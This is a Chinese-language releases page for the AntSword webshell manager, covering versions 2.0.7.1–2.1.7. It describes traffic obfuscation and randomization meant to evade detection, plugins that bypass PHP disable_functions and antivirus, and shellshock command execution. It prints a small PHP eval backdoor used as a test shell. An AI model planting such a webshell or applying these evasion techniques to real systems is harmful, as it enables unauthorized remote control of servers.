Skip to content

Releases: AntSwordProject/antSword

AntSword v2.1.7

30 Oct 07:53
Compare
Choose a tag to compare

安全更新

  • fix #222 感谢 @9tail123
  • 重要: 增加全局 html 转义, 在每次响应后强制进行 html 转义, 避免过滤时漏掉的问题

此更新会影响大部分插件的使用, 请及时更新插件或重装插件

如果在使用当中发现二次转义的情况, 请报告 issue

  • 新增「报告漏洞」链接, 可在「关于程序」页中看到, 也可点下面的链接直达

https://forms.gle/HrUMxedsyREeXw4R9

如在后续发现漏洞, 请以该方式进行提交, 待修复后再公开

AntSword v2.1.6

17 Sep 02:03
Compare
Choose a tag to compare

后端模块

  • 修复数据截取 Bug
  • ❗️修复返回包Content-Type为非文本时连接异常问题 (#213)

核心模块

  • ❗️数据分割字符随机化增强(随机内容, 随机长度 5~12 位), 避免客户端发包产生固定的 Content-Length
  • 新增 antSword["RANDOMWORDS"] 全局变量, 存放英文单词, 如需要定制字典请修改 source/base/word.js
  • 新增 antSword["utils"] 全局变量, 包函 RandomChoice, RandomLowercase 函数
  • ❗️发包随机变量名去除 _0x 通用变量前缀
  • 核心模版发包键名支持随机英文单词

Shell 管理

  • ❗️新增「使用随机英文单词变量」配置项, 在发包时非密码变量名会使用随机产生的英文单词 (thx @Ch1ngg)

ranword_1.png

未勾选此配置项时, 发包变量名如下:

randword_2.png

勾选此项设置后, 发包变量名如下:

randword_3.png

  • 新增常用插件功能面板, 可自定义配置常用插件到此面板, 快速调用

shell_toolbar.png

其它

  • jsp_custom_script_for_mysql 提供 AES 编码解码示例
  • jsp_custom_script_for_mysql 增加 Version 显示
  • ❗️windows 下单击鼠标左键 Tray Icon 显示/隐藏 主窗口 改为 「双击」
  • 默认设置新增 「使用随机英文单词变量」配置项
  • ❗️移除 shells 目录, 示例脚本已转至 AwesomeScript 仓库下

插件相关

通过正则匹配,查找后门 webshell

scanwebshell

AntSword v2.1.5

19 Aug 07:39
Compare
Choose a tag to compare

核心模块

系统设置

  • 「默认设置」新增「虚拟终端」配置块, 可设置默认字体缩放比例, 最小0.5倍, 最大2倍 (通过快捷键最大可到5倍)

拖动 slider bar 之后, 下方可实时预览效果, 点击保存后即可生效(无需重启)

adefault_terminal.png

虚拟终端

  • 新增 options['tsize'] 可覆盖全局缩放设置
  • 支持全局缩放配置 #203

插件相关

在目标服务器上查询可读可写可执行目录以及可用于suid提权的文件(支持asp,aspx,php)

check_rwx_suid

  • 新增插件 inject_und3ad Author: @phantom11235

  • 「as_webshell_venom」更新到 v3.2

  • 「绕过 Disable_functions」更新到 v0.5

其它

  • 修复 Linux Gnome 桌面环境下 minimize 时窗口消失问题 #204

AntSword v2.1.4

16 Jul 02:51
Compare
Choose a tag to compare

核心模块

  • 增加 PHP 执行命令的函数(proc_open,COM('Wscript.shell'), shellshock) #194

    • COM 组件执行命令, 该模块为 Windows 专属, 需要目标在 php.ini 中打开 COM 选项: com.allow_dcom = true, 注意, PHP 5.4.5 后,com/dotnet模块已经成了单独的扩展, 所以还需要在 php.ini 中配置 extension=php_com_dotnet.dll, 如果 PHP < 5.4.5 则不需要。
    • shellshock 利用 bash 破壳(CVE-2014-6271)执行命令, 需要目标的 /bin/sh 链接为 /bin/bash 且存在破壳漏洞
  • 新增全局变量 antSword['module'] 用于存放所有核心模块, 方便在插件中引入

文件管理

  • 修复标签页编辑文件时,路径过长导致右侧按钮不显示的 bug (#192)
  • 新建文件时, 默认内容前面加了 # 号(防止在shell当前目录下, 新建 .htaccess 语法错误导致整个目录无法解析)

虚拟终端

  • 新增 options['exec'] 用于替换当前 Terminal 中生成 payload 函数

插件相关

  • 绕过 disable_functions 更新到 0.4

    • 新增「FastCGI/PHP-FPM」模式

      适用于PHP-FPM/FCGI 监听在 unix socket 或者 tcp socket 上时使用。常见的比如: nginx + fpm。IIS+FPM 使用的是「管道」通信,不适用。

    • 新增「Apache_Mod_CGI」模式

      利用 .htaccess 添加一个新的 cgi 后缀, 完成命令执行

    • 优化了 .antproxy.php 性能问题

    • 修复了 .antproxy.php 不会代理 querystring 的问题

    • 以上模式可在 「AntSword-Labs」仓库中找到相关 Docker 环境, 可自行在本机搭建环境测试

AntSword v2.1.3

11 Jun 04:35
Compare
Choose a tag to compare

核心模块

  • 移除解码器 decode_str 方法, 统一调用 decode_buff 方法

decode_str 其实相当于是 decode_buff 执行后调用了 toString

  • 解码器解码后, 增加猜解字符编码流程
  • 修复 PHP mysqli 指定其它端口时失败的问题
  • CUSTOM 类型新增 hex, base64, hex_base64 三种类型解码器 (需要对应 Shell 实现该功能, 参考: jsp_custom_script_for_mysql.jsp)

hex_base64 是指 shell 返回数据时, 先将明文数据使用 base64 编码, 再将结果 hex 编码

将 pwd payload 全部转换成 %uxxxx 这种形式, eg: Re => %u0052%u0065

文件管理

  • 「文件下载」支持多文件下载, 不支持选择「文件夹」 #140

其它

  • 修复 jsp_custom_script_for_mysql.jsp 使用 base64 编码器连接数据库时 characterEncoding 二次解码导致的无法识别的问题 #171

  • 修复 ASPCustom 数据库管理导出问题 #172

  • jsp_custom_script_for_mysql.jsp, jsp_custom_script_for_oracle.jsp, jspx_custom_script_for_mysql.jspx 新增解码器支持

  • 现在可以使用 HomeBrew 来安装、更新 AntSword-LoaderAntSword 了。参见 homebrew-antsword

    具体步骤如下:

    1. 添加 antsword 源
    $ brew tap antswordproject/antsword
    
    1. 安装 antsword-loader
    $ brew cask install antsword-loader
    
    1. 安装 antsword
    $ brew install antsword
    

    安装完毕后,运行 AntSword.app, 选择源码目录为 /usr/local/opt/antsword

    如果使用 HomeBrew 来管理antsword-loader 和 antsword 的版本,请一直使用该方式进行管理

插件相关

利用随机异或免杀D盾蚁剑版

AntSword v2.1.2

13 May 11:51
Compare
Choose a tag to compare

核心模块

  • ❗️修复 multipart 发包方式 download 发包为空的问题 (asunescape 功能引起), 更新后需要关闭程序重启后生效
  • ❗️编码器 ext 参数新增元素 opts, 值为当前 shell 的配置

有了这个,你就可以根据 shell 的配置信息来动态的进行加密了, 比如用 Cookie 里面的 SessionID 来作为秘钥

与之相关的一个 Demo, PHP AES-256-CFB (zeroPadding) 编码器
https://github.com/AntSwordProject/AwesomeEncoder/blob/master/php/encoder/aes_256_cfb_zero_padding.js

另一个 Demo, PHP AES-128-ECB (zeroPadding) 编码器
https://github.com/AntSwordProject/AwesomeEncoder/blob/master/php/encoder/aes_128_ecb_zero_padding.js

  • ❗️解码器新增 ext 参数, 用于获取 shell 配置和rsa私钥

有了这个,解码器可以进行一些更为灵活的用法了. 比如用 Cookie 中的 SessionID 来作为秘钥, 对返回的内容进行解密

与之相关的一个 Demo, PHP AES-256-CFB (Zero Padding) 解码器
https://github.com/AntSwordProject/AwesomeEncoder/blob/master/php/decoder/aes_256_cfb_zero_padding.js

另一个 Demo, PHP AES-128-ECB (pkcs7Padding) 解码器
https://github.com/AntSwordProject/AwesomeEncoder/blob/master/php/decoder/aes_128_ecb_pkcs7_padding.js

PS:

可以用 AES-256-CFB 编码器, 对请求包进行加密, 返回包加密使用 AES-128-ECB 解码器

也可以用 AES-128-ECB 编码器, 对请求包进行加密, 返回包加密使用 AES-256-CFB 解码器

当然, 你可以根据自己的喜好, 用自己喜欢的 AES 加密方式, 这些怎么组合, 都看你。你要不喜欢用 AES, 你想用什么就用什么。

  • 支持加载用户自定义解码器

    同编码器一样, 现在可以加载用户自己自定义的解码器了, 以PHP为例, 加载位置为 antData/encoders/php/decoder/

数据管理

  • 「添加数据」时自动载入「默认设置」中「数据管理」全局配置内容 (配置方式见后文)

adefault_shellmanager_2.png

其它

  • ❗️「默认设置」新增「数据管理」设置, 可配置「是否忽略HTTPS证书」、「默认请求超时时长」、「默认 HTTP Header」和「默认 HTTP Body」

该配置项仅在「添加数据」时生效,不影响已有配置的 Shell。在添加数据界面修改相应的值, 仅对当前 Shell 配置产生影响,不会影响到默认配置

adefault_shellmanager_1.png

  • 新增第三方库 marked 0.6.2 用于 markdown 渲染
  • 更新提示窗口新增 ReleaseNote 显示(缩放显示,图片看不清可直接前往 github 查看详细更新日志), 新增 「更新日志」按钮(点击后直接打开 github release 页)
  • 「编码管理」新增「获取更多」按钮, 打开浏览器访问 AwesomeEncoder(自定义编码器分享), 如果你有比较好的 Encoder, 欢迎向这个仓库提PR
  • ❗️「编码管理」新增解码器管理, 可创建自定义解码器

aencoder.png

  • 新增第三方库 crypto-js 3.1.9-1 , 可以更方便的进行各种加解密处理了

nodejs 自带 crypto 库, 也可使用 crypto-js 这个库来进行加密处理, 这个第三方库使用起来相对更简单一些, 但同时限制也会多一些, 自行取舍

AntSword v2.1.1

27 Apr 14:56
Compare
Choose a tag to compare

核心模块

  • ❗️新增「解码器」(目前仅支持 PHP)

将返回数据包进行编码/加密

  • ❗️新增 PHP base64rot13 解码器

decoder_1.png

decoder_2.png

  • 修复使用 __destruct 类型 shell 时 解码器不生效的 Bug (thx @scanf)

取消 register_shutdown_function 改为显式调用 asoutput

测试 Shell 如下:

<?php
class Test{
  function __destruct(){
    @eval($_POST['ant']);
  }
}
$test = new Test;
?>

Shell 管理

  • 修复搜索数据时正则表达式输入错误导致crash 问题 #157

数据管理

  • ❗️添加SQL语句书签功能, 将常用的 SQL 语句保存成书签

db_bookmark_2.jpg

  • 修复数据库查询结果字段名有逗号时异常

其它

  • 「默认设置」数据管理项中, 增加「全局书签」设置, 设置一些自己常用的 SQL 语句

db_bookmark_1.jpg

插件相关

从 CSV 中 批量导入 Shell

CSV格式:

**备注,分类,密码,类型,Shell地址**
举个例子:
测试1,test,pass,php,http://gov.cn/666.php
测试2,test,pass,php,http://fbi.com/warning.php
测试3,test,666,php,https://www.virzz.com/vk.php

异常处理,体验优化

AntSword v2.1.0

24 Apr 08:34
Compare
Choose a tag to compare

重要提醒

❗️从该版本开始, 将逐渐不兼容老版本加载器, 建议马上升级 AntSword Loader 到 4.0.3 版本: 下载地址

依赖相关更新

  • 升级 Electron4.0.3 (Chromium 69.0.3497.106 and Node 10.11.0)

❗️影响较大的是编码器中关于 Buffer 相关的操作, 原来的 new Buffer() 方式已被弃用, 请更改为 Buffer.from()

  • 升级 Semanticui2.2.7
  • 升级 ACE Editor1.4.3
  • 调整 ant-views://ant-src://ant-static:// 协议, 注册为标准scheme

默认情况下 web storage apis (localStorage, sessionStorage, webSQL, indexedDB, cookies) 被禁止访问非标准schemes

  • 添加 node-rsa 依赖包

安全更新

  • 主窗口中增加 CSP 策略

功能更新

  • 新增「复制 Shell URL」功能
  • 编码器新增扩展参数
  • ❗️编码器添加 RSA 模式,目前仅支持 PHP (@virink)
  • 新增 asp insert_percent 编码器 #152
  • ❗️编码器中支持 asunescape() 标记

asunescape 括号中的内容在HTTP请求时,不会进行urlEncode

eg:

data["key1"] = "++asunescape(@@@)++"; => "key1=%3B%3B@@@%3B%3B"

  • 新增 Loader 更新检查功能
  • 插件市场新增「更新插件」功能

插件相关

突破 disable_functions 执行系统命令,绕过 Open_basedir 等安全机制

黑客神器,谁用谁知道!

其它

  • 🎉欢迎 @virink 加入 AntSword Project

AntSword v2.0.7.2

17 Apr 05:20
Compare
Choose a tag to compare
  • Fix #150 文件路径输入框未过滤问题(thx @zkaq)
  • 修复目录树双击时引起 console下报错问题
  • 修正 aslistcmd 二次转义问题
  • 修复Shell管理分类重命名时self-xss影响体验问题

社区发展离不开每一位社区成员的参与与帮助,社区的参与形式也不局限于贡献代码,除了这些,还可以通过提供新需求、编写插件、软件测试、代码审计、漏洞挖掘、漏洞修复等形式,帮助我们更好的完善蚁剑。

AntSword v2.0.7.1

12 Apr 03:13
Compare
Choose a tag to compare

安全更新 (重要, 建议所有用户更新)

  • Fix toastr 输出时未过滤导致的 xss 漏洞, 由于在 webview 中开启了 nodejs 功能, 可借此引起 RCE #147 (thx @ev0A)

为了防止插件中 toastr 出现类似问题, 修改了 toastr 可以输出 html 的特点,以后均不支持输出 html

其它

  • 修正错别字 #145